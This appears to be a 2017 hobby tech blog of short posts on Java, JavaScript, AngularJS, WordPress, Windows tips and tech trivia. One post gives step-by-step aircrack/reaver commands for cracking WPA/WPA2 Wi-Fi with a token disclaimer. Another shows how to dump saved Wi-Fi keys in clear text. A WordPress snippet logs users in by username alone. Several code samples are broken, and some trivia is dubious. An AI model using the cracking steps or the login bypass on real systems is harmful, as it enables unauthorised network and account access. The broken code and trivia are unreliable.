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December 29, 2017

How to Find any Wi-Fi Password on Windows

Sometimes you may forget the wifi password of your network you are connected or it may be difficult to remember password. So here is the simple command line trick to find out the password. Follow these steps if you’re using Windows 7,8 or 10.

  • Open CMD as an administrator.
  • Paste the following code:
  • netsh wlan show profiles
    You will get a list of the networks that are known to your computer.
  • Now paste the following code. Replace "profilename" with the network name.
  • netsh wlan show profile name=profilename key=clear
    Look for the "Content Key". That is your password.

December 14, 2017

Things to Remember If You Are Developing Your Website

If your are starting to develop your website or starting website development then you should consider user experience also. I am giving some tips to get started here. If you do not know anything about typography, but you care about readability, you should try this as a starting point.

  1. A minimum of 18px font size.
  2. Line spacing of 1.6
  3. #333 for color or thereabouts.
  4. Limit your lines to a width of 700px.
These are few tips for starting. I will keep updating it with other useful tips for starting as developer.

5 Tips to Become a Web Developer

If you ever wanted to become a web developer then here are the five tips to get started with.
  1. You can volunteer or intern in different companies. This is the quickest way to get hired or work as a web developer. So find any local companies or any around you and ask for volunteer.
  2. Your goal is to gain experience in the real world as quickly as possible and build your portfolio. So say yes to every websites including unpaid ones.
  3. You need to build your portfolio to make it strong. So where do you put your work? Well, this can be your own web site and I recommend this if you want to look professional. You can host it on GitHub.com and GitHub.io all for FREE and you can buy your own domain also if you like.
  4. Find a mentor and join local or online coding groups.
  5. There are plenty of open source projects today. You can contribute little by little in those projects to make familiar with the web development world

December 13, 2017

Rare Euro Coins

2 Euros coin dedicated to Grace Kelly was put into circulation in 2007, and it costs between 600 to 1,000 euros. Just 20,000 of them were made. 1 Italian cent was released in Italy 15 years ago, and costs around 6,000 euros. Why? The coins, issued in 2002 have the same design as 2-cent coins.

December 9, 2017

How to clean your Windows Temp folder

The temp folder contains files that are only needed temporally. Unfortunately, these files that are meant to be deleted don't always get deleted after their job is done, resulting in wasted drive space.

To open the temp folder, click Start or go to the Windows 8 Search, type %temp%, and select the folder that appears first. Once the folder is opened, you can manually delete files and folders. But you probably can't delete all of them. Windows won't let you do away with those currently in use. That's fine. You don't want to delete those ones anyway.

In fact, you really don't want to delete any files created since the last time you booted your PC. So if you shut down Windows every night (and I mean shut it down, not sleep or hibernate), and boot clean every morning, you can safely delete any files in Temp not dated today. You can easily do it in an old-fashioned way, DOS-style batch file to automatically clean out the folder every time you boot. Here's the process:

Open Notepad, and type these two lines:

    rd %temp% /s /q
    md %temp%

Save the file as %appdata%\microsoft\windows\start menu\programs\startup\cleantemp.bat. This will create the batch file, cleantemp.bat, inside your Start menu's Startup submenu. Everything in that menu loads automatically when you boot. Windows 8 doesn't have a Start menu. But it still has the folder. And the trick still works.


December 5, 2017

Time Saving Tips for AngularJS Developer

Here are some of the tips while learning and coding on angularjs.

At a high / architecture level:

  1. Do not forget to write your tests. In Javascript, you don't have the compiler to hand hold you and tell you that you did something wrong. And you will want to pull your hair out the next time your app is broken because of a missing letter. And the large your application gets, having the comfort of making large scale changes and refactorings without worrying about broken functionality is amazing. And writing your unit tests is the only way to get there.
  2. Don't put too many things on the scope. The scope is expensive, as it is the one that undergoes dirty checks. Just put exactly what will be displayed on the UI on the scope, and leave the rest as variables in the controller, but not on the scope.
  3. Data is the truth. Let the data drive the app, and not any other way. You should purely focus on getting the data in the right places. The route controlling logic, the watches and the data binding should drive what is visible in the UI.
  4. If you need a UI widget like datepicker, autocomplete then think directive. Wrap all your third party components in directives for easy reuse, as well as to make your app modular. Being able to write <input datepicker> is way better than writing <input id="myinput"> and then in JS, $('#something').datepicker().
  5. Don't do DOM manipulation in your controllers, as well as your services. Try to restrict that work to directives.
  6. If you need to communicate between controllers, there are basically two options. Either create a service which is sigleton and use it to communicate or fire events on the scope, and have the other controller watch. Don't create your own new way outside of these two.
  7. Dependency Injection: Understand it, love it, breathe and live it. That should be the one and only way you ask for and work with services or any dependencies from any of your code.
  8. For directives, try and isolate the scopes so that you can reuse them without worries. Isolating the scope ensures that your directive does not depend on some particular method / variable on a parent scope, and thus can be reused. Pass in whatever you need as arguments to the directive. Use the databinding to ensure you get the updated value instead of the value at that instant.

Basic Linux Commands

Below are some of the commonly used linux commands.
Note: Think twice before using rm -rf / command. :D

Regular Expressions in JavaScript with Examples

Example 1 : To return all the matched strings
var a = "This is regular expression example.";
var regex = /regular/g; // to find string regular
var matches = a.match(regex);

Example 2:  To return all matched numbers
var a = "This is 1 apple, this is 2 apple";
var regex = /\d+/g;
var matches = a.match(regex);

Example 3:  To return number of spaces in the sentence
var a = "How many spaces are there in this sentence?";
var regex = /\s+/g;
var matches = a.match(regex).length;

How to Generate Random Number within the range

This example shows how to generate random number from the range of number given.
function generateRandomNumber(minNum, maxNum) {
        return Math.floor(Math.random() * (maxNum- minNum+ 1)) + minNum;
generateRandomNumber(5, 15);

Above code will generate random number between 5 and 15.

Cool jQuery Tricks

Some of cool jQuery functions usage:
1. To add bounce animation to any element:
 $(elem).addClass("animate bounce");

2. To add shake animation to any element:
 $(elem).addClass("animate shake");

3. To disable buttons or any control elements:
$(elem).prop("disabled", true);
You can also use attr() function, but attr() is deprecated. So use prop().

Cool JavaScript Tricks

Today I would like to mention some of the JavaScript tricks that many JavaScript programmers do not know. They are cool to have in our code, but some are not practiced in real world. Here are few of them.
  1. Use of .call() function:
    If you want to iterate over the properties of object.
    var listitems = document.querySelectorAll('li'); 
    [].forEach.call(items, function(item) {
    //your code here
    Above code does the same as the code below
    for (i = 0; i < items.length; i++) {
    var item= items[i];
    // your code here
    Reversing a string:
    var js = 'hello javascript';
    var sj = [].reverse.call(hey.split('')).join(''); // "tpircsavaj olleh"
  2. Always use var while declaring variable for the first time.
  3. Use === instead of == .
  4. undefined, null, 0, false, "", NaN are all false values.
  5. Use semicolon (;) for line termination.
  6. Get random item in an array.
    var items = [12, 548 , 'a' , 2 , 5478 , 'foo' , 8852, , 'Doe' , 2145 , 119];
    var random = items[Math.floor(Math.random() * items.length)];
  7. Verify that the given argument is number
    function isNumber(n){
        return !isNaN(parseFloat(n)) && isFinite(n);

Automatically join any group when new user registers in Buddypress

function auto_join_group($user_id, $group_id) {
    if( !$user_id ) return false;

    // Join user to group with group id $group_id
    groups_accept_invite( $user_id, $group_id);

add_action( 'bp_core_activated_user', 'auto_join_group' );

Useful Buddypress Functions

bp_loggedin_user_id() = Get logged in user id
bp_displayed_user_id() = Get id of displayed user
bp_core_get_username($user_id) = Get username for the given id

Programmatically login user in wordpress

 * Programmatically logs a user in
 * @param string $username
 * @return bool True if the login was successful; false if it wasn't
function programmatic_login( $username ) {
   // if user is already logged in then first log out
    if ( is_user_logged_in() ) {

    add_filter( 'authenticate', 'allow_programmatic_login', 10, 3 );
    $user = wp_signon( array( 'user_login' => $username ) );
    remove_filter( 'authenticate', 'allow_programmatic_login', 10, 3 );
    if ( $user instanceof WP_User ) {
        wp_set_current_user( $user->ID, $user->user_login );

        if ( is_user_logged_in() ) {
            return true;

    return false;

 * An 'authenticate' filter callback that authenticates the user using only the username.
 * To avoid potential security vulnerabilities, this should only be used in the context of a programmatic login,
 * and unhooked immediately after it fires.
 * @param WP_User $user
 * @param string $username
 * @param string $password
 * @return bool|WP_User a WP_User object if the username matched an existing user, or false if it didn't
function allow_programmatic_login( $user, $username, $password ) {
    return get_user_by( 'login', $username );

November 24, 2017

Factorial By Recursion

import java.util.Scanner;

public class RecursionEx {
 public static void main(String args[]){
  Scanner temp = new Scanner(System.in);
  System.out.println("Enter number to find its factorial: ");
  long x = temp.nextLong();
 public static long fact(long n){
   return 1;
   return n * fact(n-1);

Constructor in Java

class Sample{
 private String girlName;
 public Sample(String name){
 public void setName(String name){
 public String getName(){
  return girlName;
 public void displaydata(){
  System.out.printf("Name of the girl is %s", getName());

public class ConstructorEx {
 public static void main(String args[]){
  Sample sampleObj=new Sample("priya");

November 23, 2017

Program to sort numbers

class Sorting{
 public static void main(String args[]){
  int number[]={55,40,70,80,90,21};
  int n = number.length;
                System.out.print("Given list:");
                for (int i=0;i<n;i++)
            //Sorting begins
                for(int i=0;i<n;i++){
                    for (int j=i+1;j<n;j++){
                        if (number[i]<number[j]){
                            //interchange values
                               int temp=number[i];
                System.out.print("Sorted list:");
                for(int i=0;i<n;i++){

Hello World in JAVA

It is the trend to write the program to print "Hello World" while starting with any language. We will also do the same. Below is the program and I will also explain useful things used in program.

class Hello{
 public static void main(Strings[] args){
   System.out.println("Hello World!!!");
  1. Open any text editor and write the above program. Note that some are in capital letters.
  2. Now save the file with name Hello.java
  3. Open command prompt and browse the location where the file is located.
  4. For eg: If the file is located in c:/javatut/ then goto the same folder location in cmd.
  5. Now type javac Hello.java
  6. This command will compile your java file and creates class file.
  7. Now type java Hello
  8. If the compilation worked then you will get the output.

Some explanations

  • The first statement defines the main class which is required and the class name should be in initial capital letter.
  • The second statement defines the main function or method of the class. The first letter of String is capitalized as it is the class name.
  • The third statement is used to display output. First letter of System is capitalized and the println statement creates new line after the output. You can also sumply use print only.

Basic rules while programming in JAVA

There are some of the ground rules while you are programming in JAVA. Before we start on writing the first program we will talk about common rules you must follow, which you must mock up.

  • The file name must be same as the main class name you used.
  • Class name must be start with the initial capital letter. Java is case sensitive language.
  • Any classes you used in the program must start with the capital letter and the method name with small letter.
  • The class file is obtained after the compilation of the program and it is the bytecode that can run in any platform which hava JDK.
We will start with the first program and syntax in out next post. Till then stay tune...

How to set path for JDK

In the previous post i have mentioned about the software and hardware requirements to get started with java programming. Only having those requirements is not enough. We need to set path of the JDK as the environment variables. There are two ways for doing this.

Process 1

We can set the path from the command prompt. The steps are mentioned below.
  1. Open the command prompt.
  2. Type javac and press enter.
  3. If the result is shown as the command is not recognized, that means path is not set. Or if some help commands are shown then path is already set.
  4. To set path first you need to copy the location of jdk installed in your drive.
  5. Goto c:\program files and find java folder. Inside the java folder search for folder with jdk and its version. Inside it goto bin folder. And click on any file and view properties and there copy the path. It looks like this "C:\Program Files\Java\jdk1.5.0_09\bin" . Copy it.
  6. In the command prompt, type "set path=%path%;C:\Program Files\Java\jdk1.5.0_09\bin" without the double quotes. The path is only sample example. It may vary according to the JDK version.
  7. Now to check whether the path is set correctly or not, type javac and press enter. Now the results are shown instead of showing error. Now you can run the java program.

Process 2

  1. Goto the windows properties.
  2. Click on advanced system setting.
  3. Click the environment variables.
  4. In the system variables, click on add new.
  5. Then enter "PATH" in variable name and in the variable value enter the path that is copied as in process 1.
  6. To check do as in process 1.
Sometimes following process 2 may not work properly, so process 1 is followed mostly. In the next post I will write the first program and ways to run in the command prompt.

JAVA Introduction

Java is one of the object oriented programming language which is used to make complex programs and applications. Java has many features which you will learn through out this tutorials. I here present the basic syntax, codes, program examples for you. Java is platform independent language so you can run this in any machine.
There are some of the requirements to run the java program and I will tell you what.
  1. You need to install Java Development Kit(JDK) in your machine before you run program and you also need to set path which I will show you later.
  2. You need a java editor like eclipse, netbeans or you can simply use notepad for writing the codes.
  3. You need computer system with pentium processor.

You can download the JDK from the java site http://www.oracle.com/technetwork/java/javase/downloads/index.html and select one that is compactible with your machine. In next post i will write about how to code your first program and run in command prompt. Bye Bye...

November 19, 2017

Hack WPA WPA2 wifi with airmon-ng Kali Linus

Disclaimer: This tutorials is for educational purpose only. I am not responsible for any illegal activities performed with this tutorials.

You must be using kali linux for this process.
1. Open terminal with root access
2. Type ifconfig
3. airmon-ng start wlan0
You will get list of processes that will interfare with the process so kill them one by one.
4. kill PID
5. airodump-ng wlan0
Now break the operation with ctrl+C
5. wash -i mon0
Now break the operation after some time with ctrl+C
Open new terminal and type
6. reaver -i mon0 -b bssid -vv
here bssid refers to the bssid of the network you want to crack.
If there is some errors with this operation type following
7. reaver -i mon0 -b bssid -d 30 -vv -dh-small

Wait for the process to complete. It will take several hours depending upon the strength of wifi network and the password strength.

November 15, 2017

Earn online with affiliate marketing with BestChange

BestChange is a specialized online e-currency exchange service that monitors rates for dozens of popular conversion pairs in near real-time and offers one-click access to lists of reliable e-currency exchangers capable of helping you complete your transaction quickly and efficiently. It has a affiliate program that lets affiliate user earn for their promotion. You can now earn from the referral visits, sign ups and activity. Minimum payout is $1 and offers different payment methods. For more information you can visit the site Electronic money exchangers. Electronic money exchangers

  1. Visit the link above Electronic money exchangers.
  2. Click on "affiliate program" navigation bar.
  3. Read terms and click "follow link".
  4. And sign up.
  5. Remember to read all texts in check box. You donot need to check second from last option.

November 14, 2017

10 Ways to Become a Better Developer

  1. Read other people's code.
  2. Get someone to read your code.
  3. Fix bugs before writing new code.
  4. Learn a new technology.
  5. Keep it simple.
  6. Write a blog post about your code.
  7. Contribute to open source.
  8. Fix it, Don't hack it.
  9. Increase code coverage by 1%.
  10. Leave your desk every hour.

Future For Computer Geeks

This generation that we are living is the computer age. Everything in this today's world are somehow connected to the computer and the technology. Alright lets just talk about the computer. For those who want their future in the computer may be for engineers, programmers, designers and so on they have a very bright future if only they can struggle. Many people in this field have earned much more wealth and this is just in increasing trend. So in this blog i am writing about everything for a computer geek. If you are also a beginner in this field then every post are equally important. I will post the tutorials, codes, important steps and many more here. What you mist do is stay tuned.

We will soon meet in next post.

How to fix Duplicate error with ng-repeat in angularjs

While working with angularjs directive ng-repeat, you may have encountered with the problem of duplicate error with ng-repeat. Here is the proper description and problem and the solution of it.
In order for angular to know exactly what items have changed, it calculates a hash for each item within the ng-repeat. Otherwise, if you had 5 items with the exact same contents, how would it be able to determine which of those items was modified? When it determines that duplicates exist, it prints out that error.
In this case, to get around this, there's a track by expression that you can add to the end of the ng-repeat expression. This expression lets you define a property that uniquely identifies each item in the array. For arrays with primitive types, one approach is to use track by $index which tracks each item in the array by the objects position within the array.
<div ng-repeat="num in [1, 2, 2, 3] track by $index">
By adding the track by $index, you will not get the duplicate error. 

September 26, 2017

Cool Google Tricks

Google is one of the most commonly used search engine. Google is the Proclaimed king among all search engines present on the internet. Among all the web based search engines, Google stands out because of its high speed and simplicity. Even if people are used to google very few know about some very handy Google tricks that come along with this impeccable search engine. Below are some Cool Google Tricks that I have Collected. Enjoy !!!

1. Calculator

You can use the Google search engine as a real time calculator as well. For instance, if you will type 20*2 in the search box, 40 will get displayed. You can perform basic arithmetic calculation with this trick. If you are using chrome browser then typing in the url bar will work as google search.

2. Term Definition

You can now get the definition of any technical terms from simple google search. There is no longer the need to type a word and then visit dictionaries online to find its meaning. Using this trick, all you need to do is simply write "define" followed by the word whose meaning you want to know. This Cool Google tricks come very handy if you use it effectively. You can get meaning along with its synonym and antonym of the term.

September 24, 2017

Facts about Technology that will amuse you

We are bound with the revolution of technology today. There is always something new being presented to human beings when it comes to technology, and we never cease to become bored of it. There are plenty of things about technology that would interest you or amuse you. I have collected some of the interesting facts about technology today that will amase you for sure. Check out the amazing facts here:

  1. The majority of computer users blink 7 times per minute at most, compared to the normal blink rate of 20 blinks per minute.
  2. Email was invented before the web; which means that it has been around longer.
  3. The home of Bill Gates was designed with the use of a Macintosh Computer.
  4. The original Macintosh case which was created during the year of 1982, contains 47 signatures of the division of Apple’s Macintosh members.
  5. Doug Engelhard invented the very first computer mouse which was made out of wood. He created it in 1964.
  6. On a regular work day for a typist, their fingers travel at an average rate of about 12.6 miles per day.
  7. The state of Alaska is the only state whose letters can be typed in a straight row of keyboard letters.
  8. Ebay has about $680 worth of transactions that take place per second.
  9. There are more than one million domain names that are registered online per month.
  10. Apple, Microsoft, HP, and Google are all IT applications that started development in a garage.
  11. The social Media website Myspace has about 110 million registered users. If the social media site had been considered a country it would be the 10th largest; right after Mexico.
  12. Youtube.com was registered February 14th, 2005.
  13. The Dvorak keyboard is known to be more efficient and 20 times faster than Qwerty.
  14. Computer programming is an occupation that is growing faster than any other.
  15. The first online advertisement banner was created and used in the year of 1994.
  16. Hewlett Packard, which is more known as HP, was invented in a garage in Palo Alto during the year of 1939.
  17. As of this year, there are currently 17 billion devices that are connected or related to the internet and the use of the internet.
  18. About 1 out of 8 couples met their spouse on the internet within the past few years. There are more people meeting their significant others online each year.
  19. If you are able to find a way to hack into Facebook then they will pay you up to $500.
  20. There are about 1 billion instant messenger accounts that are active around the world today
The above are 20 interesting facts about technology that you may or may not have been aware of. Now that you know that you can share these facts with other people who might not know about them. It is most certainly considered to be entertainment for your brain. You can also check some interesting facts about computer here.

Interesting Computer Facts

Check out interesting facts about technology.
While dealing with technology, you may confront with many computer tweaks and realize interesting computer facts. Here I have listed some of the top interesting computer facts. I will update it time and again with new discoveries. So do not forget to check it.
  1. Over 6,000 new computer viruses are released every month.
  2. 20% of online viruses are released by organized crime units.
  3. The first computer mouse, constructed in 1964, was made out of wood.(by Doug Engelbart)
  4. The first electro-mechanical computer was developed in 1939.
  5. The engineers who developed the IBM PC were known as “The Dirty Dozen”
  6. The average human being blinks 20 times a minute – but only 7 times a minute when using a computer.
  7. By the end of 2012 there will be 17 billion devices connected to the internet.
  8. 5 out of every 6 internet pages are porn related.
  9. Over 1 million domain names are registered every month.
  10. With it’s 800 million interent users, Facebook would be the third largest country in the World.
  11. The first hard drive was created in 1979 and could hold 5MB of data.
  12. The nVidia GeForce 6800 Ultra video card contains 222 million transistors.

How to choose the right laptop for programming

For the best result in the programming one must be very careful while choosing right laptop. Choosing the right laptop for programming can be a tough job. So you must have proper research on this matter. It’s easy to get confused while researching the various options. There are many different laptop models out there, each with a different set of trade-offs.

You can write code on most laptops. Yet, your productivity will improve if you use a machine suited to the type of tasks that you perform. There are different types of development, and various tools are required with each specialization. So, there is no one-size-fits-all approach to buying a development machine.
Hence, I made the following assumptions in this article:
  1. You are a web developer.
  2. Your laptop is your primary development machine.
Here are some considerations before purchasing your next laptop.


Laptops come in all shapes and sizes. You need to figure out how portable you want your laptop to be. If you do not need to carry your laptop around often, you might want to consider a 15'' laptop. These will usually have better specs and more screen estate for multitasking. If you work in different locations or travel a lot, a 13-14'' laptop may be best for you. They are lighter and provide longer battery life. Unless you’re buying a 2-in-1 laptop, a touchscreen does not provide enough benefits to justify the extra cost. I’d suggest you avoid the touchscreen.

September 16, 2017

Combine two videos using VLC media player

VLC media player is best known as a video player but it has other many advantages also as a video editing software which includes merging or combining multiple videos into single video. So today lets talk about how we can merge two videos into single video using VLC media player.

Before starting, we will need two video clips with the identical encoding or video format. If the videos are not of identical format, then VLC also provides another features of converting video of one format to another. We can use it to transcoding the files if they are not of same format.


September 9, 2017

Apple iPhone 8 launch date and specifications

Apple's iPhone 8 event will be held on September 12

2017 will mark the 10th anniversary of the iPhone and Apple has something major planned to celebrate the occasion with major iPhone redesign planned for 2017. It will now come with a glass body and edge-to-edge OLED display that does away with the Home button and perhaps replaces Touch ID with a new facial recognition system. At the same time apple is also releasing iPhone 7s and iPhone 7s plus.

  • 5.8" OLED display
  • Faster A11 processor
  • Glass body
  • Edge-to-edge display
  • Facial Recognition, perhaps replacing Touch ID
  • No Home button
  • Wireless charging
  • Three models - One OLED, two standard